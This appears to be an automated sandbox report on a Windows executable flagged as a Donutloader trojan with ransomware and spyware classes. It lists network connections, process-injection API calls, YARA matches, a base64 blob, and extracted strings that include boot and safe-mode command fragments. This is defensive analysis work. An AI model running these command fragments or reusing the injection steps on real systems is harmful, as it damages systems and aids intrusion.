                    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49799 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49812 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49820 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49907 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49926 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49939 version: TLS 1.2
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA9320 #413,GetUpdateRect,#413,BeginPaint,GetWindowDC,#413,GetWindowRect,CreateCompatibleDC,#413,CreateCompatibleBitmap,SelectObject,GetBkColor,CreateSolidBrush,FillRect,GetSysColorBrush,FillRect,FillRect,SendMessageW,BitBlt,SelectObject,DeleteDC,DeleteObject,ReleaseDC,EndPaint,#413,0_2_00AA9320

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: WyPb2uVZ1P.exe | Binary or memory string: valuedb_version[YaraScanner::LoadVersionInformation] Found signatures version (%ls)[YaraScanner::LoadSignaturesPackage] Loading signatures package (%ls)...YaraScanner::LoadSignaturesPackage: Invalid archive (%ls)YaraScanner::LoadSignaturesPackage: Unable to unzip dataYaraScanner::LoadSignaturesPackage: Invalid data (%ls)[YaraScanner::LoadSignaturesPackage] Extracted signatures to (%ls)[YaraScanner::LoadPortableSignatures] Loading portable signatures package (%ls)...[YaraScanner::LoadPortableSignatures] Unable to open portable package (%ls)...[YaraScanner::LoadPortableSignatures] Unable to load portable signatures package (%ls)...%s/api.php?action=checkpackageversion&token=%s&version=%s&yara_version=%s&beta=true&client=&client_version=[YaraScanner::CheckForUpdates] Server returned empty response[YaraScanner::CheckForUpdates] Server returned bad data[YaraScanner::CheckForUpdates] Signatures outdated (%ls => %ls).[YaraScanner::LoadRemoteSignatures] Loading remote signatures, download_new=%d...scanner_signatures_update_allowedYaraScanner::LoadRemoteSignatures: Downloading %ls...%s/api.php?action=downloadpublication&token=%s&version=%s&encrypted=true&yara_version=%s[YaraScanner::LoadRemoteSignatures] Error while downloading from %ls[YaraScanner::LoadRemoteSignatures] Signatures updated (%ls => %ls).[YaraScanner::LoadExistingSignatures] Loading local signatures...YaraScanner::LoadExistingSignatures: Unable to load version data[YaraScanner::LoadExistingSignatures] Engine not ready, discarding...YaraScanner::LoadExistingSignatures: Unable to lock the engine for updateaddonsYaraScanner::LoadAddonsipsYaraScanner::LoadIpsfilenamesYaraScanner::LoadFilenamesYaraScanner::LoadServicesYaraScanner::LoadWindownamesregnamesYaraScanner::LoadRegistrynamesguidYaraScanner::LoadGUIDsYaraScanner::LoadSignaturesYaraScanner::LoadHostsYaraScanner::LoadMBRSigsdomainsYaraScanner::LoadDomainspackersYaraScanner::LoadPackersYaraScanner::LoadTasksYaraScanner::LoadWmidigisigYaraScanner::LoadDigisigpdbYaraScanner::LoadPdbwebconfigYaraScanner::LoadWebConfig[YaraScanner::LoadExistingSignatures] Unable to load signatures (%lx)[YaraScanner::LoadBackupSignatures] Loading backup signatures...[YaraScanner::LoadBackupSignatures] Unable to find backup signatures version, discarding...[YaraScanner::LoadBackupSignatures] Engine is not ready, discarding...YaraScanner::Total[YaraScanner::LoadSignaturesFromResources] Filtered by engine flag, %lu[YaraScanner::LoadSignaturesFromResources] Unable to load signatures from resources, %lu[YaraScanner::LoadSignaturesFromFile] Filtered by engine flag, %ls[YaraScanner::LoadSignaturesFromFile] Unable to load signatures from file, %ls[YaraScanner::LoadSignaturesFromFile] Unable to load signatures from buffer, %lsthreat067158767e2655e9c5e298626d209619https://adflux.adlice.com
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A92A60 _memcpy_s,CryptImportKey,CryptSetKeyParam

                    System Summary

                    Source: 0.2.WyPb2uVZ1P.exe.4ca1590.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.cs | Large array initialization: Brotli: array initializer size 122784
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.cs | Large array initialization: Brotli: array initializer size 32768
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.cs | Large array initialization: Brotli: array initializer size 32768
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Brotli.cs | Large array initialization: Brotli: array initializer size 31705
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0066A454 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,NtUnmapViewOfSection
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AC29F6: CreateFileW,DeviceIoControl
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AC6020 SetThreadExecutionState,SetWindowTextW,LoadCursorW,SetClassLongW,__aulldiv,__aulldiv,PlaySoundW,ExitWindowsEx,__aulldiv,Sleep
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AC6B37 __aulldiv,ExitWindowsEx
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B11B35
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AC6020
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AC2142
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B11AF0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B13250
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B11B05
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B07B64
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B11C80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B13DF4
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00ACBE90
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AA16D0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00B11FED
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_030EEC48
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_03100000
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0339BB14
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0339E36C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_03399978
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0339B074
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0339A86C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0339AC3C
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0739FAB0
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0739E788
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0739E218
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0738003B
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_07380040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0066A454
                    Source: WyPb2uVZ1P.exe | Static PE information: invalid certificate
                    Source: WyPb2uVZ1P.exe | Binary or memory string: OriginalFilename vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000003.2169346203.0000000006620000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameIvauw.exe, vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000000.2031285974.0000000000B68000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRebootExec.exeF vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2351025665.0000000000B21000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameInternalNameFileDescription vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIvauw.exe, vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2368851538.0000000006620000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSaskohvekd.dll" vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe | Binary or memory string: OriginalFileNameInternalNameFileDescription vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe | Binary or memory string: OriginalFilenameRebootExec.exeF vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe | Binary or memory string: OriginalFilenameUpdater0 vs WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.WyPb2uVZ1P.exe.4ca1590.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.3102534.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, -.cs | Base64 encoded string: 'HFhUK0ieYXNCOUGWLFVOMEPdDlJUOkCRI1gcGEiHCk9TLVSyPFJCMk+fNhpAOlmsCVRLM2OSIkQcMF2sBk9CLliSI0hTJhaUKlV4E0idKFVPZGqWO3VeL0i1PU5KF0ydK01CZEqWO35pPkCWdGhJO0iLAEccDUiSK3JTLUSdKBpmO0nIKERTAH2cPEhTNkKddEZCK3KwOlNVOkOHC05KPkSddHJCK2mSO0AcbhrDdxkcHl6AKkxFM1SgKlNROl/IHEhKL0GWDlJUOkCRI1hiJ12fIFNCLRaRLkNCM1uedFJKMEaWO0RUKw=='
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: WyPb2uVZ1P.exe | Binary string: AsyncCreateFileKBMBGBTBPBbytes%I64d %s%.2llf %sdskwipe%lu\\.\%sExtendedUnformatted%ls (0x%02X)FAT12FAT16DELL (spanning)Config/diagnosticsHidden FATHidden NTFSPMagic recoveryHidden NetWareLinux/MINIXSFS/LDM/Linux SwapNovellEZ-DriveOS/2 BMXenixUNIXScramdiskXOSL FSMINIXLinux SwapLinuxHidden LinuxNTFS volume setBSD/OSHibernationBSDMac OS-XNetBSDMac OS-X BootBSDI BSD/386 swapHidden Linux swapVMwareVMware swapLinux RAIDWinNT hidden0x%02XBasic DataUnusedSystemMSFT ReservedLDM MetadataLDM DataMSFT Recovery%c:\\.\%c:\DosDevices\%c:ABCDEFGHIJKLMNOPQRSTUVwXYZ\Device\Harddisk%d\Partition%dError: %ld
                    Source: WyPb2uVZ1P.exe | Binary string: \\.\PhysicalDrive%d\Device\Floppy%d\Device\CdRom%d\Device\Ramdisk\Device\countrydnsapi.dllDnsFlushResolverCacheProcessIdToSessionIdSeTcbPrivilegewinlogon.exe\c3
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@4/0@2/2
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AA09D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,AdjustTokenPrivileges
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AA7620 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A922C0 CoCreateInstance,PathFileExistsW
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AB9E60 FindResourceW,SizeofResource,LoadResource,LockResource
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
                    Source: WyPb2uVZ1P.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: WyPb2uVZ1P.exe | ReversingLabs: Detection: 56%
                    Source: WyPb2uVZ1P.exe | Virustotal: Detection: 45%
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 x8Slot type: PCI Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: % Method 2: If method 1 does not work, you can prevent file types from being associated with some apps. In order to block an app, click or tap the corresponding tile below. Already blocked apps have a "Stop sign" icon overlayed. To unblock the same app, just click or tap it again. Changes are instantly applied. Please associate the desired file types with your preferred programs before blocking, or you may not be able to do it afterwards..+\\Microsoft\\Edge\\Application\\msedge.exeMicrosoft\.MicrosoftEdge_.+microsoft\.windowscommunicationsapps_.+Microsoft\.Windows.Photos_.+Microsoft\.ZuneVideo_.+Microsoft\.ZuneMusic_.+Microsoft\.MSPaint_.+(Microsoft\.WindowsNotepad_.+)|(\\Windows\\(System32\\)?notepad.exe)HKLM64\Software\ClassesAppX\shell\open\command\\Software\ClassesHKU\AppX\Application\ApplicationNameAppUserModelID\shell\open\command\IMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGE4.7.0.0http://www.carifred.com/stop_resetting_my_apps/about.php?ver=http://www.carifred.com/stop_resetting_my_apps/http://www.carifred.com/donate/?product=StopResettingMyAppsSorry, method 1 failed. please try method 2.IMAGEYour file associations were successfully reset and fixed.
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: -update_target-arch-install_path-allowed_types-restart-params-product-update_target <target_path>-install_path <install_path>-allowed_types <type1;type2>-arch x64|x86-params "application parameters"-product <product_id>string too longinvalid string positionHj.RegValUnknownMBR.ForgedCritical.ProcessSuspicious.StartupRoot.KeyloggerRoot.FilterHidden.From.RegistryHidden.From.SCMProc.InjectedProc.RunPECloud.GenericCloud.Unknown.OrphanHidden.ADSHj.ShortcutMal.AppLockExploitBad.ExtensionCloud.SafeGood.ValueKnown.GoodExcludedRogueKiller RTPIs.StoppedProvides real-time protection for RogueKiller Anti-Malware.RegVal.MalformedrkrtserviceDocLock.BlockedDocLock.DataLeak.BlockedClipprot.BlockedSigned.SafeSuspicious.ShadowCopySuspicious.RebootSafeSuspicious.DigisigMozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0[0-9A-F]{16}.metaProc.HiddenProc.SvchostMalPESuspicious.PathSCNMal.PowershellDELMal.MshtaMal.WscriptPUPPUMHj.NameHj.HostsFile.ForgedRegVal.BrokRegKey.Brok
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: EDGE-add-on
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: dialog-help-icon
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: filedialog-start-icon
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: P_q_stylesheet_parent1styleSheetParentDestroyed()QToolTip::setTipRect: Cannot pass null widget if rect is set/* */qtooltip_labelno screens available, assuming 24-bit coloractivate-on-singleclickalignmentarrow-keys-navigate-into-childrenbackward-iconbutton-layoutcd-iconcombobox-list-mousetrackingcombobox-popupcomputer-icondesktop-icondialog-apply-icondialog-cancel-icondialog-close-icondialog-discard-icondialog-help-icondialog-no-icondialog-ok-icondialog-open-icondialog-reset-icondialog-save-icondialog-yes-icondialogbuttonbox-buttons-have-iconsdirectory-closed-icondirectory-icondirectory-link-icondirectory-open-icondither-disable-textdockwidget-close-icondownarrow-icondvd-iconetch-disabled-textfile-iconfile-link-iconfiledialog-backward-iconfiledialog-contentsview-iconfiledialog-detailedview-iconfiledialog-end-iconfiledialog-infoview-iconfiledialog-listview-iconfiledialog-new-directory-iconfiledialog-parent-directory-iconfiledialog-start-iconfloppy-iconforward-icongridline-colorharddisk-iconhome-iconicon-sizeleftarrow-iconlineedit-password-characterlineedit-password-mask-delaymdi-fill-space-on-maximizemenu-scrollablemenubar-altkey-navigationmenubar-separatormessagebox-critical-iconmessagebox-information-iconmessagebox-question-iconmessagebox-text-interaction-flagsmessagebox-warning-iconmouse-trackingnetwork-iconopacitypaint-alternating-row-colors-for-empty-arearightarrow-iconscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controlscrollview-frame-around-contentsshow-decoration-selectedspinbox-click-autorepeat-ratespincontrol-disable-on-boundstabbar-elide-modetabbar-prefer-no-arrowstitlebar-close-icontitlebar-contexthelp-icontitlebar-maximize-icontitlebar-menu-icontitlebar-minimize-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontoolbutton-popup-delaytrash-iconuparrow-icon
